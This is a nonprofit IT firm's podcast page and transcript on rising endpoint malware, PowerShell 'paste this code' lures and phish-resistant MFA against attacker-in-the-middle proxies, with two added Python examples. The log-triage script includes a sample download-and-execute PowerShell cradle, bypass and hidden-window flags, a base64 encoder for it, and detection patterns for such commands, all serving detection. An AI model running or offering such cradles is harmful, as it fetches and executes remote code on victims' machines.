What Do Nonprofits Need to Know Now About Cybersecurity, Viruses, and Phish-Resistant MFA?
Nonprofit Cybersecurity expert and Community IT CTO Matt Eshleman offered his take on these trends. Listen for expert advice on avoiding new computer viruses and making sure your organization is protected from Attacker-in-the-Middle attacks on MFA (Multi-Factor Authentication), particularly for important accounts like your Executive Director and CFO.
Like podcasts? Find our full archive here or anywhere you listen to podcasts: search Community IT Innovators Nonprofit Technology Topics on Apple, Spotify, Google, Stitcher, Pandora, and more. Or ask your smart speaker.
Takeaways on Cybersecurity, Computer Viruses, and Phish-Resistant MFA
Fighting Viruses
- Virus (malicious-software) detections on endpoints have been increasing after years of near-zero activity. These are no longer just files that arrive through an email link or a compromised website; many are "living off the land" or fileless attacks in which the victim is talked into running a PowerShell command themselves.
- Bad actors know we are suspicious of links in our email and that most malicious messages are now stopped before they reach the inbox. As a workaround, they send a harmless-looking document, or a link to one, with instructions to open it by pasting a supplied "secure code" into PowerShell or a terminal. That code is the malware: the victim runs the attack against themselves, and the original email carries nothing a filter can flag.
- To resist this attack, remember that a legitimate sender with a legitimate document can simply send you a PDF. Be very suspicious of any attachment or link that requires another set of steps to open, particularly copying and running commands on your computer. Forward it to your IT provider instead of following the steps.
- Other ways you may pick up a computer virus: downloading a utility or "helper" tool from a look-alike site. Double-check you are on the vendor's legitimate site before downloading anything; better yet, use the App Store or your organization's approved software catalog where possible. Unpatched on-premises web servers and databases are also being targeted and should be migrated to a current, supported platform.
- We are also seeing more malicious browser pop-ups. A window that says your computer is infected and gives a number to call is frightening by design, and it often fills the screen with no obvious close button. Do not call the number, or you will be calling the scammer. Close the browser (force-quit it if it will not close) and contact your own IT provider.
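The "paste this code to open the secure document" lure above leaves a trace on the endpoint: the PowerShell that the victim runs. The following is an added example, not code from the page or from Community IT, of a small triage script over PowerShell script-block text (Windows event 4104 ScriptBlockText, or a powershell.exe command line). The sample log lines are constructed for the example, the hostname is invented, and the indicator list is an assumption rather than any vendor's rule set.

```python
"""Added example (not from the page or from Community IT): a triage script that
scans PowerShell activity, such as the ScriptBlockText of Windows event 4104 or
the command line of a powershell.exe process, for the patterns behind
"paste this code to open the secure document" lures.  The sample lines below
are constructed for the example and the indicator list is an assumption, not
a vendor rule set."""
import base64
import re

# Indicators typical of user-executed, fileless PowerShell.  Case-insensitive
# because PowerShell is.  The order only fixes the order of the returned list.
INDICATORS = [
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|Net\.WebClient", re.I)),
    ("invoke_expression", re.compile(r"Invoke-Expression|\bIEX\b", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-(?:ep|ExecutionPolicy)\s+bypass", re.I)),
    ("mshta_or_rundll", re.compile(r"\bmshta\b|\brundll32\b", re.I)),
    ("encoded_command", re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)),
]
ENCODED_RX = INDICATORS[-1][1]


def encode_command(script):
    """Build a -EncodedCommand payload: base64 over UTF-16LE, as PowerShell expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse of encode_command; returns "" if the blob is not a valid payload."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(line):
    """Return the names of the indicators that fire on one log line.  Any
    -EncodedCommand payload is decoded first, so a base64-wrapped cradle is
    matched on its plaintext instead of being hidden by the encoding."""
    text = line
    m = ENCODED_RX.search(line)
    if m:
        text = line + "\n" + decode_encoded_command(m.group(1))
    return [name for name, rx in INDICATORS if rx.search(text)]


# Constructed samples: a benign admin one-liner, a classic download cradle with
# the flags a lure would include, and the same cradle base64-wrapped.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://files.example/secure.ps1')"
SAMPLE_LOGS = [
    "Get-Process | Where-Object CPU -gt 100 | Sort-Object CPU -Descending",
    'powershell -ep bypass -w hidden -c "' + CRADLE + '"',
    "powershell -w hidden -enc " + encode_command(CRADLE),
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        hits = analyze(line)
        print(("ALERT " if hits else "ok    ") + ", ".join(hits) + "  <- " + line[:70])
```

Script-block logging has to be turned on (the "Turn on PowerShell Script Block Logging" policy) for event 4104 to exist at all; without it the only record of a user-pasted command is the process command line, which an encoded payload hides unless it is decoded as above. Treat a hit as a triage prompt, not a verdict: legitimate admin tooling also uses Invoke-WebRequest and hidden windows.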
Using Phish-Resistant MFA
- Community IT continues to recommend that every user have Multi-Factor Authentication on every account. Any MFA is far better than none; the methods below close the remaining gap.
- Because MFA is so effective, attackers have worked around it. In the past few years Attacker-in-the-Middle (AitM) attacks have been on the rise: the victim is lured to a proxy site that relays the real login page, types their password and approves the MFA prompt as usual, and the proxy captures the session token the identity provider issues after the successful login. The attacker replays that token from another device and has access to everything the user has. In Community IT's incident data, Microsoft 365 accounts are hit this way more often than Google accounts.
- Phish-Resistant MFA, such as a passkey, Windows Hello, or Touch ID on a Mac, binds the credential to the device and to the real site's domain: the browser signs the site's origin into the login response, so a proxy on another domain cannot produce a valid login, and there is no code or approval for the victim to relay. A physical FIDO2 security key (for example a YubiKey) works the same way and must be present at login. Yubico runs a donation program for nonprofits; otherwise keys cost roughly $20 to $40 per person. Microsoft Authenticator can also be enrolled as a passkey if you would rather not buy anything.
- At a minimum, accounts with access to sensitive data or money, such as the Executive Director, CFO, executive team, and possibly Board members, should use Phish-Resistant MFA. Any account is a foothold into your network, so where possible, rolling it out to all staff is a good investment.
- Training on Phish-Resistant MFA lessens the friction or the feeling that an extra step is required. Most of it is quick to use once enrolled, and often faster than finding your phone and the right authenticator app. Peace of mind is worth it.
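To make the difference between a relayed MFA prompt and a passkey concrete, here is an added example, not code from the page or from Community IT, of the relying-party check that a FIDO2/WebAuthn login goes through. The hostnames are invented; the signature is an HMAC stand-in for the authenticator's ECDSA signature so the block runs on the Python standard library alone; sign-count tracking and public-key lookup, which a real relying party also does, are left out.

```python
"""Added example (not from the page or from Community IT): a minimal relying
party (RP) check showing why a passkey or FIDO2 security key survives an
attacker-in-the-middle proxy while a relayed one-time code does not.
Assumptions: hostnames are invented; the signature is an HMAC stand-in for the
authenticator's ECDSA signature so the example runs on the standard library
alone; sign-count and public-key lookup, which a real RP also does, are omitted."""
import hashlib
import hmac
import json
import os

RP_ID = "login.example"                         # relying party ID registered with the credential
GOOD_ORIGIN = "https://login.example"           # where the real login page lives
PROXY_ORIGIN = "https://login-example.evil"     # AitM site relaying that page to the victim


def authenticator_assert(cred_key, rp_id, challenge, origin):
    """What the browser plus authenticator return for a login (navigator.credentials.get).

    The browser, not the page, writes `origin` from the address bar into
    clientDataJSON, and authenticator data starts with SHA-256(rpId).
    The signature covers authenticatorData || SHA-256(clientDataJSON).
    """
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": origin},
        separators=(",", ":")).encode()
    auth_data = (hashlib.sha256(rp_id.encode()).digest()   # rpIdHash
                 + b"\x01"                                  # flags: user present
                 + (0).to_bytes(4, "big"))                  # signCount
    sig = hmac.new(cred_key, auth_data + hashlib.sha256(client_data).digest(),
                   hashlib.sha256).digest()                 # stand-in for ECDSA
    return client_data, auth_data, sig


def rp_verify(cred_key, expected_challenge, client_data, auth_data, sig):
    """Relying-party side.  Returns (ok, reason).  The origin and rpIdHash checks
    are what make the credential phish-resistant: a proxy on another domain can
    relay the challenge but cannot make the browser sign the real origin."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong type"
    if not hmac.compare_digest(cd.get("challenge", ""), expected_challenge):
        return False, "challenge mismatch"
    if cd.get("origin") != GOOD_ORIGIN:
        return False, "origin mismatch: " + str(cd.get("origin"))
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    expected = hmac.new(cred_key, auth_data + hashlib.sha256(client_data).digest(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return False, "bad signature"
    return True, "ok"


def simulate_login(origin):
    """Whole exchange: RP challenge -> browser at `origin` -> authenticator -> RP."""
    cred_key = b"per-credential-secret-set-at-registration"   # stand-in for the private key
    challenge = os.urandom(32).hex()                           # fresh RP nonce
    client_data, auth_data, sig = authenticator_assert(cred_key, RP_ID, challenge, origin)
    return rp_verify(cred_key, challenge, client_data, auth_data, sig)


def verify_otp(expected_code, submitted_code):
    """A relayed number-match or one-time code.  The RP only ever sees the code,
    never where it was typed, so a proxy forwarding the victim's code passes."""
    return hmac.compare_digest(expected_code, submitted_code)


if __name__ == "__main__":
    for origin in (GOOD_ORIGIN, PROXY_ORIGIN):
        print(origin, "->", simulate_login(origin))
    print("relayed OTP ->", verify_otp("482913", "482913"))
```

In practice the proxy case fails even earlier: the browser refuses the `navigator.credentials.get` call when the requested RP ID is not the page's own domain, so the victim at the proxy site never gets a prompt to approve. The relying party's origin check is the second layer, and the fresh challenge stops replay of a captured assertion. The `verify_otp` contrast is the whole problem with push approval and number matching: the identity provider receives only a yes/no or a six-digit code and has no way to tell it was relayed.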
In many ways, these new types of attacks just draw attention to the good work we have been doing in security awareness training for staff and leadership. Compared to a few years ago, nonprofit employees are becoming more and more savvy on the ways to protect our organizations against fraud, theft, data breaches, and other cybercrime.
Community IT hopes that building this culture of care at your organization makes it easier for you to update your staff on new threats and scams through your regular training program. If you have questions on security awareness training, reach out and schedule an assessment with Matt.
Presenters

As the Chief Technology Officer at Community IT, Matthew Eshleman leads the team responsible for strategic planning, research, and implementation of the technology platforms used by nonprofit organization clients to be secure and productive. With a deep background in network infrastructure, he fundamentally understands how nonprofit tech works and interoperates both in the office and in the cloud. With extensive experience serving nonprofits, Matt also understands nonprofit culture and constraints, and has a history of implementing cost-effective and secure solutions at the enterprise level.
Matt has over 23 years of expertise in cybersecurity, IT support, team leadership, software selection and research, and client support. Matt is a frequent speaker on cybersecurity topics for nonprofits and has presented at NTEN events, the Inside NGO conference, Nonprofit Risk Management Summit and Credit Builders Alliance Symposium, LGBT MAP Finance Conference, and Tech Forward Conference. He is also the session designer and trainer for TechSoup’s Digital Security course, and our resident Cybersecurity expert.
Matt holds dual degrees in Computer Science and Computer Information Systems from Eastern Mennonite University, and an MBA from the Carey School of Business at Johns Hopkins University.
He is available as a speaker on cybersecurity topics affecting nonprofits, including cyber insurance compliance, staff training, and incident response. You can view Matt’s free cybersecurity videos from past webinars here.

Carolyn Woodard is currently head of Marketing and Outreach at Community IT Innovators. She has served many roles at Community IT, from client to project manager to marketing. With over twenty years of experience in the nonprofit world, including as a nonprofit technology project manager and Director of IT at both large and small organizations, Carolyn knows the frustrations and delights of working with technology professionals, accidental techies, executives, and staff to deliver your organization’s mission and keep your IT infrastructure operating. She has a master’s degree in Nonprofit Management from Johns Hopkins University and received her undergraduate degree in English Literature from Williams College.
She was happy to have this podcast conversation with Matt Eshleman about cybersecurity, viruses and phish-resistant MFA for nonprofits.
Ready to get strategic about your IT?
Community IT has been serving nonprofits exclusively for twenty years. We offer Managed IT support services for nonprofits that want to outsource all or part of their IT support and hosted services. For a fixed monthly fee, we provide unlimited remote and on-site help desk support, proactive network management, and ongoing IT planning from a dedicated team of experts in nonprofit-focused IT. And our clients benefit from our IT Business Managers team who will work with you to plan your IT investments and technology roadmap if you don’t have an in-house IT Director.
We constantly research and evaluate new technology to ensure that you get cutting-edge solutions that are tailored to your organization, using standard industry tech tools that don’t lock you into a single vendor or consultant. We don’t treat any aspect of nonprofit IT as if it is too complicated for you to understand. When you are worried about recovering from a cybersecurity incident, you shouldn’t have to worry about understanding your provider.
If you have questions about cybersecurity, incident response planning, or business continuity, you can learn more about our approach and client services and contact us here.
We think your IT vendor should be able to explain everything without jargon or lingo. If you can’t understand your IT management strategy to your own satisfaction, keep asking your questions until you find an outsourced IT provider who will partner with you for well-managed IT.
If you’re ready to gain peace of mind about your IT support, let’s talk.
Transcript
Carolyn Woodard: Welcome everyone to the Community IT Innovators Technology Topics Podcast. I’m Carolyn Woodard, your host, and I’m really excited today to be here with Matthew Eshleman, our CTO and cybersecurity expert at Community IT. And Matt, would you like to introduce yourself?
Matt Eshleman: It’s great to join you today. My name is Matthew Eshleman, and as Carolyn said, I’m the Chief Technology Officer here at Community IT. I’ve been with the company over 20 years, played a lot of different roles during my tenure, and I’m currently focused on our back-end cybersecurity platforms and work with clients on some of the specific training and strategy around cybersecurity initiatives. It’s great to get a chance to talk a little bit more about that today.
Carolyn Woodard: I think you had a couple of topics that are recently in the news and recently coming up that you’d like to talk a little bit more about.
Matt Eshleman: Yeah, exactly. Every year we do our nonprofit incident report, which you can download and find on our website. That’s something that we published a few months ago. Now that we’re well past halfway into 2025, I actually took a look just to see where things are at. I look at year-to-date trends for the cybersecurity incidents that we are responding to as an IT support provider that works with over 200 nonprofit organizations and supports about 8,000 users, just to see where things are at, any different trends or initiatives that we’re seeing.
And one thing did actually pop out as being something new and maybe unexpected.
Rise in Viruses
When I looked at the data that we’re seeing, we do actually have a noticeable spike in the virus activity that we’re seeing on endpoints, which is unique. I would say for many, many years, there was little to none in terms of malicious activity. You know, I would have said at that point the web filters are doing their job, blocking things, email security tools are blocking the ability to download those things.
To see this change was actually really a surprise. I maybe had seen a little bit of it and been like, oh, there’s more virus tickets than I was used to seeing, but actually seeing the numbers was surprising.
Carolyn Woodard: I feel like viruses are like 1990s, don’t you?
Matt Eshleman: Yeah, exactly. And so that’s why it was such a surprise to see the numbers.
Now, I will say, from my perspective, we categorize two different classes of malicious endpoint activity. One thing that we’ve actually seen a pretty high level of that’s really frustrating to deal with and kind of hard to stop would be those malicious browser pop ups.
If you’ve ever been on a website and then all of a sudden you get this pop up that says, your computer has been infected, call this number right away. Or on a Mac, it says it’s detected a virus, here’s the number to call to get service, right?
Those things are really tough to protect against because they use this browser pop up service that a lot of other trusted websites use to provide notifications. There are some downsides to turning that off. It kind of creates a scary situation that people get tricked into calling that number or they’re not able to figure out how to close the browser window because it takes over the whole screen and there’s not an obvious way to close it. So, we have seen that level or that type of attack pretty frequently.
But the virus activity, which we would categorize as actually being malicious software, that’s the stuff that really has increased.
It can be kind of that traditional old school, you know, you download an executable and run it, and it tries to do stuff on your computer. But we are also now seeing what would be called “living off the land attacks” or so-called “fileless malware,” which would be things like, for Windows computers, a PowerShell scripting, where the bad guys are able to get people to attempt to execute this malicious PowerShell. In some cases, they ask people to run it as part of an attachment. And they’ll say, hey, this is a secure file. Here’s the code that you need to run in order for us to have a secure communication, right? And so, they’ll run it that way.
You know, we do have a few clients that are still hosting web servers that are publishing resources or databases and that kind of thing. And so those systems are really getting targeted as well. I think a combination of some legacy on-prem things that aren’t updated to people running this malicious PowerShell and being tricked into it. I think people searching for and trying to download different utilities, that’s a way that these things are getting initiated.
And I do have to wonder if, at the root, maybe some of the reasons why we’re seeing this increase in malicious software, malicious code is due to the continued lower barrier to entry for running malicious software, right? You can throw it into AI, generate some prompts, have some crafty queries, right? Hey, I need a PowerShell script that does X, Y or Z. And now all of a sudden, instead of, the whatever the 1% of people being able to write that malicious software, now it’s 50% of the hackers can write that software. So, all that to say we are seeing more virus activity on endpoints, some of its user initiated.
The good news is, I would say, is that our security tools are really blocking and preventing this. And so, we still haven’t had those cases where there is actual ransomware or something malicious is ultimately executed in all these cases because we have cloud-enabled endpoint protection on all the devices we’re supporting.
You know, we’re getting those alerts into our platform that, hey, like this threat was identified, it’s been blocked, it’s been quarantined. But that number has really been on the rise year after year. So be attentive to what you’re doing when you’re browsing. You know, don’t download random software just because it has a good and appealing link. And for those folks that still have that on-prem website, database, software, that really needs to be migrated into an up-to-date and modern platform. Yeah.
Carolyn Woodard: Do you think that, I wonder, too, we’ve been doing so much training with people to be careful about what they’re seeing in their inbox, and we’ve maybe trained people very well to not click on the weird link that’s right in the e-mail, and that’s causing the bad guys to use AI to make something that’s very convincing of like, oh, you need to open this Word document, and to open it, because it’s a secure document, you have to run this little script. Let me give you the code that you should put in and how you should do it.
Then people are just not on their guard or haven’t been on their guard against that. But after listening to this podcast, hopefully everyone is thinking, don’t download random things from the internet, and don’t think that if somebody sends you an email, and there’s another step you have to do to open something, that you should do that extra step.
Matt Eshleman: Yeah, I think that is good advice, and again, something we do see quite often as a method that these attackers are using, right, is that they’re not sending an email that contains a malicious attachment, they’re sending an email that has a link to a malicious attachment, or instructions on how to run that software yourselves.
And so again, those initial messages often will land in people’s inboxes because there’s nothing malicious about the message or the attachment itself, but it’s like one or two steps beyond, then that’s where the trap is sprung, so to speak.
Carolyn Woodard: That makes sense, that we’re doing a good job at both training people around their email, but also in preventing bad emails from getting to them. So, the bad guys are finding other ways to get around it.
And you had another topic you wanted to tell us about, to put us on our guard.
Phish-Resistant MFA
Matt Eshleman: Yeah, well, I guess in the same vein as keeping aware of the changing security landscape, the topic of MFA and multi-factor authentication continues to be relevant. We’ve been talking about multi-factor authentication for many, many years now. And that’s something that we see in our data as we track security incidents year over year.
When we first were tracking account compromises, it was pretty low. And then the number really spiked as I think the shift to the cloud created this opportunity for hackers to steal people’s credentials.
Then as we introduced MFA for the first time that those numbers really dropped. And it was pretty clear to see that the only accounts that were getting compromised were those accounts that lacked MFA protection.
That was true for a couple of years until a few years ago, where we really started to see the rise of these so-called attacker-in-the-middle frameworks or a proxy attack, where the bad guys figured out that they didn’t really actually need to get your password, but they could steal the authentication token that was underlying all of the authentication.
Then they could use that token and use that to connect from a different location and impersonate you as a user.
And so that’s really been the case for the last couple of years as these attacker-in-the-middle frameworks have been very effective at stealing people’s access method and the bad guys are able to take that.
We have seen that Microsoft 365 accounts appear to be targeted more frequently than Google accounts. We haven’t done an exhaustive deep dive on that, but it is pretty clear that we have a lot more Microsoft accounts compromised than we do Google accounts, even taking in that user base difference that we see.
The good news is that there is a way to combat this type of attack, and that’s through the use of, it gets called Phish-Resistant MFA, like it’s referred to as Passkeys or FIDO2, right? There’s a lot of different acronyms that are there, but there’s much more exhaustive and precise technical definitions that you can find out there on the internet.
But essentially, Phish-Resistant MFA ties your authentication to the specific device that you are on when you’re making that authentication, you’re completing that authentication process.
So, whereas in the traditional Microsoft Authenticator, right, you are responding to a number matching prompt or you’re affirming that, hey, yes, this is me logging in. You know, that authentication method can be stolen and moved if you’re going through one of these proxies.
So, the Phish-Resistant MFA says, hey, we’re only going to allow this authentication token to exist when it’s coming from this specific device that we know and trust and have validated.
So that’s an important transition to make, particularly, I think, for users in the organizations that have access to finances, right? Seeing that we’re largely in an opportunistic cybercrime environment where the bad guys are really after money, right? The primary driver of this is cybercrime. You know, they’re after the people that can make the changes to wire payment information, can buy gift cards, can do those things.
So, protecting accounts that are in that category is really important with Phish-Resistant MFA. The good news is that you can do that. It’s a lot easier to do that now than it was several years ago. You know, you can do that with built-in technology in your existing computer.
So, whether that’s a Windows computer, you can use Microsoft Hello to provide Phish-Resistant MFA. If you’re on a Mac, you can use the Trusted Enclave and Touch ID as a way to provide that Phish-Resistant MFA. And Microsoft has even started to add in that Passkey support to the Microsoft Authenticator app on your phone.
So, it does mean that for organizations, right, if you don’t have to buy your staff another app or token or anything, they can use some of the existing tools that they have.
One option would be to use Microsoft Authenticator and enroll it in Passkey support. It is a little clunky, it’s not a perfect and super frictionless MFA requirement; you have to take a picture, use a QR code on your phone, right? So, it seems a little clunky, but it does work, it’s very effective, and you know, you don’t have to buy anything else extra.
You know, on the flip side, you can still buy those physical security keys, right? FIDO keys and use that as a secure MFA method. I’d point folks to the YubiKey donation program. They have a donation program geared towards nonprofit organizations. And they will provide those physical keys as a donation if you qualify. Even if you don’t qualify, you can get FIDO keys for $20 to $30, $40 per person.
And so again, if people have those reservations around using their personal phone for work, it’s easy to provide somebody a physical key, just be done with it. And then you’ve got a really strong authentication method that really provides a high level of protection against those opportunistic hackers that are out there.
Carolyn Woodard: Well, I feel like you had said earlier, but we should probably highlight that maybe people on your executive team, your CFO, your executive director, maybe even people on your board who have access to a lot of that sensitive information that you might want to just get them the FIDO keys if they’re not willing to do the other options or just do some training with them, of this is how you use the more secure Phish-Resistant MFA so that you make sure that those people are really protected.
And I do want to just make sure that we say, like back in the day when it was passwords, it was like we would never say, well, they can crack your password, so just don’t use one. You know, like there’s no point. Right.
So, we’ve been saying forever that MFA, you have to have MFA on all your accounts for everything you do. And we still say that. It’s still better than leaving the doors open. We’re just saying, I heard something the other day that said if there’s an option to make a passkey, do it. Like you should be doing that if you’re on a Mac for all of the different options. And then as you said for Microsoft, if you’re using Hello, just use that.
Matt Eshleman: Yeah. And I think folks that are making that transition into passkeys, I think you will find it’s a much lower bar to enter. It makes your authentications faster if you’ve enrolled it. So, I use both a Mac and a PC. The sites that I have that are passkey enrolled are tied to my Touch ID or Windows Hello.
I don’t have to go find my phone and click on this or do that. The device has all of that security information. It’s embedded and I can have that really fast and secure authentication process in a way that actually is faster for me than trying to go back and go to my phone and find the right MFA app that I stored that token in. I think it can be a better and faster method.
Carolyn Woodard: Well, just me personally, I tend to wait a little while and see if this is like really a thing before I start doing it all the time. And the first couple of times I saw passkeys, I was like, well, what is that? Like, I already have the authenticator. Are you trying to trick me?
So, it’s good to know that the passkey, as you said, it’s going to tie your logging in to the device that you’re on so that that can’t be stolen and used by some bad guy in some other location to pretend to be you.
Matt Eshleman: Yeah, exactly.
Carolyn Woodard: Great. Well, thank you so much for your time today, Matt. I really appreciate it. I think these are great tips for our users, both in your nonprofit world and in your personal world as well. When you’re logging in to your bank, if you have an option to make a more secure MFA passkey to log in, it’s always good to be more careful.
Matt Eshleman: Yes, exactly. Just be attentive out there. Be mindful of downloading or executing commands that are given to you by email. And then again, take a look and see what the options are for you to enable passkey support for the systems that you’re accessing.
Carolyn Woodard: Sounds good. Thank you.
Matt Eshleman: Thanks.
Photo by National Institute of Allergy and Infectious Diseases on Unsplash